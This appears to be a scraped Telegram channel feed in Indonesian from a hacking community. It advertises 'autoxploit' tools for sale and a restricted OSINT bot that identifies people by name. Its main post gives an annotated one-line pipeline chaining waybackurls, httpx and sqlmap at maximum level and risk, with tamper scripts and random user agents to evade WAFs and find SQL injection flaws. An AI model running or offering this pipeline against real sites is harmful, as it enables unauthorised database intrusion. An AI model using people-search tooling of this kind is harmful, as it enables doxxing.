post.media.noAccess
29.10.202406:59
Forr sell tools autoxploit💀💀
Pv @noobsbg
Pv @noobsbg
24.10.202412:39
Saya ingin memperkenalkan BlackLine OSINT Bot, sebuah bot yang dirancang khusus untuk mempermudah proses pencarian identitas seseorang hanya dengan menggunakan nama. Bot ini sangat cocok untuk mendalami teknik OSINT (Open Source Intelligence) dan menambah wawasan kalian di bidang investigasi online.
Namun, perlu diperhatikan bahwa bot ini tidak tersedia untuk umum. Penggunaannya terbatas dan membutuhkan key yang hanya dapat diperoleh dari admin. Selain itu, bot ini masih dalam tahap pengembangan, sehingga beberapa fitur mungkin belum berfungsi sepenuhnya. Ingat, bot ini hanya untuk tujuan edukasi, jadi pastikan penggunaannya tetap sesuai dengan aturan yang berlaku.
Namun, perlu diperhatikan bahwa bot ini tidak tersedia untuk umum. Penggunaannya terbatas dan membutuhkan key yang hanya dapat diperoleh dari admin. Selain itu, bot ini masih dalam tahap pengembangan, sehingga beberapa fitur mungkin belum berfungsi sepenuhnya. Ingat, bot ini hanya untuk tujuan edukasi, jadi pastikan penggunaannya tetap sesuai dengan aturan yang berlaku.
29.10.202400:07
1. waybackurls target.com
Deskripsi: Alat waybackurls digunakan untuk mengambil arsip URL dari Wayback Machine atau penyimpanan arsip lainnya untuk domain target.com.
Fungsi: Ini memberikan daftar URL yang sebelumnya diketahui untuk domain tersebut, yang bisa mencakup titik masuk potensial bagi serangan.
2. grep '='
Deskripsi: grep '=' digunakan untuk memfilter URL yang mengandung tanda =.
Fungsi: URL yang mengandung = biasanya menunjukkan adanya parameter dalam URL, yang mungkin rentan terhadap serangan SQL Injection atau eksploitasi parameter lainnya.
3. httpx --silent --status-code
Deskripsi: httpx adalah alat yang mengirimkan permintaan HTTP ke URL yang difilter dari output waybackurls dan menambahkan status code HTTP pada setiap baris URL hasilnya.
Fungsi: Ini memeriksa apakah URL masih aktif (contohnya, hanya mengambil URL yang memiliki kode status valid seperti 200).
4. awk '{print $1}'
Deskripsi: awk digunakan untuk menampilkan hanya URL, tanpa status code.
Fungsi: Karena httpx menambahkan status code pada output, awk '{print $1}' memisahkan URL tersebut agar mudah digunakan dalam tahap selanjutnya.
5. xargs -I{} sqlmap -u {} ...
Deskripsi: xargs menjalankan perintah sqlmap untuk setiap URL yang difilter, menggantikan {} dengan URL dari hasil awk.
Fungsi: xargs memungkinkan penggunaan dinamis dari URL sebagai input untuk sqlmap.
6. sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'
Deskripsi: sqlmap adalah alat otomatisasi untuk mendeteksi dan mengeksploitasi SQL Injection. Berikut parameter yang digunakan:
-u {}: Menyediakan URL target yang akan diuji.
-v 3: Menentukan tingkat verbose, memperlihatkan lebih banyak detail saat proses berjalan.
--random-agent: Menggunakan agen pengguna acak untuk setiap permintaan guna menghindari deteksi.
--tamper "between,randomcase,space2comment": Menggunakan skrip tamper tertentu (between, randomcase, space2comment) untuk mengubah pola permintaan SQL dan menghindari WAF atau filter keamanan.
--level 5 dan --risk 3: Menentukan level eksploitasi dan risiko menjadi level maksimal (5 dan 3), membuat proses lebih mendalam dan lengkap.
--batch: Menjalankan tanpa interaksi manual.
--threads 5: Menjalankan hingga 5 threads sekaligus untuk mempercepat proses.
--crawl 2: Meminta sqlmap untuk menjelajahi (crawling) hingga kedalaman 2 untuk menemukan URL tambahan pada halaman.
--suffix=') and 1=1-- -': Menambahkan sufiks khusus ke akhir permintaan untuk menguji titik injeksi SQL, dalam hal ini ') and 1=1-- -', untuk mengelabui filter SQL.
Deskripsi: Alat waybackurls digunakan untuk mengambil arsip URL dari Wayback Machine atau penyimpanan arsip lainnya untuk domain target.com.
Fungsi: Ini memberikan daftar URL yang sebelumnya diketahui untuk domain tersebut, yang bisa mencakup titik masuk potensial bagi serangan.
2. grep '='
Deskripsi: grep '=' digunakan untuk memfilter URL yang mengandung tanda =.
Fungsi: URL yang mengandung = biasanya menunjukkan adanya parameter dalam URL, yang mungkin rentan terhadap serangan SQL Injection atau eksploitasi parameter lainnya.
3. httpx --silent --status-code
Deskripsi: httpx adalah alat yang mengirimkan permintaan HTTP ke URL yang difilter dari output waybackurls dan menambahkan status code HTTP pada setiap baris URL hasilnya.
Fungsi: Ini memeriksa apakah URL masih aktif (contohnya, hanya mengambil URL yang memiliki kode status valid seperti 200).
4. awk '{print $1}'
Deskripsi: awk digunakan untuk menampilkan hanya URL, tanpa status code.
Fungsi: Karena httpx menambahkan status code pada output, awk '{print $1}' memisahkan URL tersebut agar mudah digunakan dalam tahap selanjutnya.
5. xargs -I{} sqlmap -u {} ...
Deskripsi: xargs menjalankan perintah sqlmap untuk setiap URL yang difilter, menggantikan {} dengan URL dari hasil awk.
Fungsi: xargs memungkinkan penggunaan dinamis dari URL sebagai input untuk sqlmap.
6. sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'
Deskripsi: sqlmap adalah alat otomatisasi untuk mendeteksi dan mengeksploitasi SQL Injection. Berikut parameter yang digunakan:
-u {}: Menyediakan URL target yang akan diuji.
-v 3: Menentukan tingkat verbose, memperlihatkan lebih banyak detail saat proses berjalan.
--random-agent: Menggunakan agen pengguna acak untuk setiap permintaan guna menghindari deteksi.
--tamper "between,randomcase,space2comment": Menggunakan skrip tamper tertentu (between, randomcase, space2comment) untuk mengubah pola permintaan SQL dan menghindari WAF atau filter keamanan.
--level 5 dan --risk 3: Menentukan level eksploitasi dan risiko menjadi level maksimal (5 dan 3), membuat proses lebih mendalam dan lengkap.
--batch: Menjalankan tanpa interaksi manual.
--threads 5: Menjalankan hingga 5 threads sekaligus untuk mempercepat proses.
--crawl 2: Meminta sqlmap untuk menjelajahi (crawling) hingga kedalaman 2 untuk menemukan URL tambahan pada halaman.
--suffix=') and 1=1-- -': Menambahkan sufiks khusus ke akhir permintaan untuk menguji titik injeksi SQL, dalam hal ini ') and 1=1-- -', untuk mengelabui filter SQL.
post.media.noAccess
22.10.202423:39
makasih bang atas bimbingan nya, akhirnya dapet serti meskipun lapornya udh hampir 2 bulan
29.10.202400:07
1 line comand untuk mencari kerentanan SQLI :
atau
waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'atau
waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} --random-agent --tamper=space2comment --level 5 --risk 3 --batch --threads 5
22.10.202413:06
Alhamdulillah
25.10.202401:17
Btw kerentanan yg aku temukan di 11 provinsi itu valid mas. Ini prov jogja sudah kasih serti🔥🔥🔥
Показано 1 - 7 из 7
Войдите, чтобы разблокировать больше функциональности.